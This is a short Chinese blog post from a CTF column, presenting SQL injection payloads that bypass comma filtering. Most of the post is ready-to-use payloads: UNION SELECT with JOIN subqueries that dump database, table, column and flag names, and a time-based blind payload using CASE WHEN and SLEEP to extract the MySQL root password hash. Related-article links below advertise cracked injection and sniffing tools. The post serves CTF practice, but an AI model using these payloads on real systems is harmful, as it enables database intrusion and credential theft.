SQL注入补充--不加逗号的SQL注入

最新推荐文章于 2024-08-01 20:47:16 发布
最新推荐文章于 2024-08-01 20:47:16 发布
阅读量866 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43858799/article/details/90244014
版权

针对一些题目比较坑,会过滤掉逗号,所以一般的SQL注入都会失效 这里提供一种无逗号的注入方式:

1’ union select * from (select database()) a join (select version() ) b %23 //爆库

1’ union select * from (select group_concat(table_name) from information_schema.tables where table_schema=‘sqli’) a join (select version() ) b %23 //爆表

1’ union select * from (select group_concat(column_name) from information_schema.columns where table_name=‘users’) a join (select version() ) b %23 //爆字段

1’ union select * from (select flag_9c861b688330 from users) a join (select version() ) b %23 //报数据

另外CTF中有一些作者会诱导你去跳进他的坑里 除了后台访问 还要多尝试访问index.php test.php这种常用的php文件 抓包看有什么不同 并仔细查看状态码的不同 判断后台是否有线索

————————————————————————————————————————————
select * from table1 where id =1 and exists (select * from table2 where ord(substring(username from 1 for 1)=97);

127’ UNION SELECT * FROM ((SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d JOIN (SELECT 5)e)#

select case when substring((select password from mysql.user where user=‘root’) from 1 for 1)=‘e’ then sleep(5) else 0 end #

substring((select password from mysql.user where user=‘root’) from -1)=‘e’

————————————————————————————————————————————

这里再提供一下无逗号查询的例句 根据需要更改即可

具体可以参考:
https://blog.csdn.net/nzjdsds/article/details/81322529

放羊的弔弔
关注
专栏目录
mysql注入过滤逗号,SQL注入简单总结——过滤逗号注入
weixin_33806343的博客
03-18 975
最近做了一些CTF题目,发现sql题目很喜欢出过滤","的题目,借此机会特此总结。并且我有一个想法能够通过编写tamper尽量多的解决sql注入的题目。在使用盲注的时候,需要使用到substr(),mid(),limit。这些子句方法都需要使用到逗号。对于substr()和mid()这两个方法可以使用from to的方式来解决:select substr(database() from 1 for...
【THM】SQL Injection(SQL注入)-初级渗透测试
追风少年亚索的博客
03-29 2270
撰写本文目的仅仅提供个人查看笔记用途,大家可以去官网查看,都一样的
mysql逗号注入
03-17 450
明天早上满课,然而我三点了还在任性的写代码,真是该剁手,剁手啊… 在一个 ctf比赛,遇到这样一个注入题: 用户的ip可以用x-forwarded-for来伪造,然后把ip存储到数据库去,对ip没有进行任何过滤,存在注入,但是有一个限制就是: 用‘,’逗号对ip地址进行分割,仅仅取逗号前面的第一部分内容。 然后:没有报错,没有回显,没有bool,只有延时。 送一个字,坑。。。...
SQL注入方法大全(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
08-01 2016
SQL注入方法小百科某一个数据库的名字,这个数据库十分的特殊,里面存放着,大量的隐私信息information_schema数据库的一个表schemata表的一个字段(列),这个字段记录着所有数据库的名称information_schema数据库的一个表tables表的一个字段(对应数据库的名字),这个字段里面记录着所有的数据库的名字tables表的一个字段(相应数据库所对应的表名),记录着与table_schema这个字段对应的数据库对应的表名。
挖洞经验 | 一次INSERT查询的无逗号SQL注入漏洞构造利用($10k)
systemino的博客
04-21 803
本文分享的是作者在一次众测SQL报错型注入漏洞发现过程,有趣之处在于,在后续漏洞利用的构造,如果在目标服务端数据库逻辑的INSERT查询使用逗号(Comma),将导致构造的Payload不可用,这种情况下,作者通过综合Time-based注入、Case When和Like操作成功实现了SQL注入,漏洞获得了厂商$10,000美金的奖励。 漏洞介绍 INSERT查询或UPDATE型SQL...
[SQL注入] 逗号拦截绕过
weixin_34218890的博客
06-20 472
SQL注入时,在确定了注入点后,一般都需要使用联合查询猜表的列数,也就是常见的order by n,n从大到小,直到返回正常,就确定了当前查询的列的个数。 然后再使用 UNION SELECT 1,2,3,4,5,6,7..n 这样的格式爆显示位,然后再 UNION SELECT 1,2,3,4,database(),6,7..n ,这是一个常规流程,语句包含了多个逗号。 但是如果有WAF...
SQL注入技巧之显注与盲注过滤逗号绕过详析
09-09
过滤逗号是安全领域常见的一种防御SQL注入的方法,因为SQL语句逗号通常用于分隔不同的数据列。然而,有经验的攻击者能够通过各种技巧绕过这些过滤措施。在过滤逗号的环境下,攻击者可以使用特定的SQL技巧来执行...
SQL注入简单总结——过滤逗号注入.pdf
04-08
SQL注入是一种常见的安全漏洞,通常发生在应用程序将用户输入的数据直接拼接到SQL查询语句,而不进行充分的验证和转义。"SQL注入简单总结——过滤逗号注入"的主题主要探讨了如何处理那些针对逗号(`,`)进行过滤的...
sql注入过滤字典.txt
10-15
### SQL注入过滤字典知识点详解 #### 一、SQL注入简介 SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过在应用程序接收用户输入的地方插入恶意SQL语句,来操控数据库执行非预期的操作。为了防范此类攻击,...
mysql盲注绕过_SQL注入技巧之显注与盲注过滤逗号绕过详析
weixin_26820341的博客
01-27 316
前言sql注入在很早很早以前是很常见的一个漏洞。后来随着安全水平的提高,sql注入已经很少能够看到了。但是就在今天,还有很多网站带着sql注入漏洞在运行。下面这篇文章主要介绍了关于SQL注入逗号绕过的相关内容,分享出来供大家参考学习,下面话不多说了,来一起看看详细的介绍吧1.联合查询显注绕过逗号在联合查询时使用 UNION SELECT 1,2,3,4,5,6,7..n 这样的格式爆显示位,语句...
啊D注入工具 V2.32 暗组破解版
03-20
啊D注入工具 V2.32 暗组破解版 目前最好的破解版本,功能强大,没有BUG
啊d+批量扫描+网站注入+嗅探.zip
07-06
适合课余学习钻研,啊D注入工具是一款由彭岸峰开发的用于SQL的注入工具,其使用了多线程技术,可帮助用户在极端的时间内扫描注入点,且用户无需经过太多的学习即可熟练的操作它。嗅探_Cain & Abel V4.9,是一个可以crack屏保、PWL密码、共享密码、缓存口令、远程共享口令、SMB口令、支持VNC口令解码、Cisco Type-7口令解码、Base64口令解码
啊D注入工具
02-15
一款经典的注入工具,让不会 的人也能快速学会拿站,相比明小子我感觉这个更好
mysql语句后面需要加逗号吗_我们可以在MySQL SELECT语句之间使用逗号吗?
weixin_42311972的博客
01-26 1141
是的,我们可以做到。语法如下-Syntax1:select*fromyourTableName1,yourTableName2;Syntax2:select*fromyourTableName1crossjoinyourTableName2;上面两种语法都给出相同的结果。让我们首先创建一个表-mysql>createtableDemoTable1882(Idin...
SQL注入逗号拦截绕过
weixin_30649859的博客
07-19 149
目前所知博主仅知的两个方法 1.通过case when then 2.join [一]case when then mysql> select * from lbcms_admin where adminname like "%a%" union select 1,2,3,4,5,6,7,case when substr(database() from 1 fo...
sql in 、not in 、exists、not exists 用法和差别
oathevil的专栏
05-16 1067
exists (sql 返回结果集为真) not exists (sql 不返回结果集为真) 如下: 表A ID NAME 1    A1 2    A2 3  A3 表B ID AID NAME 1    1 B1 2    2 B2 3    2 B3 表A和表B是1对多的关系 A.ID => B.AID SELECT ID,NAME FROM A WHERE EXIST (SELECT 
【网络安全】「漏洞原理」(二)SQL 注入漏洞之理论讲解
顶峰
10-11 1227
严正声明:本博文所讨论的技术仅用于研究学习,旨在增强读者的信息安全意识,提高信息安全防护技能,严禁用于非法活动。任何个人、团体、组织不得用于非法目的,违法犯罪必将受到法律的严厉制裁。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值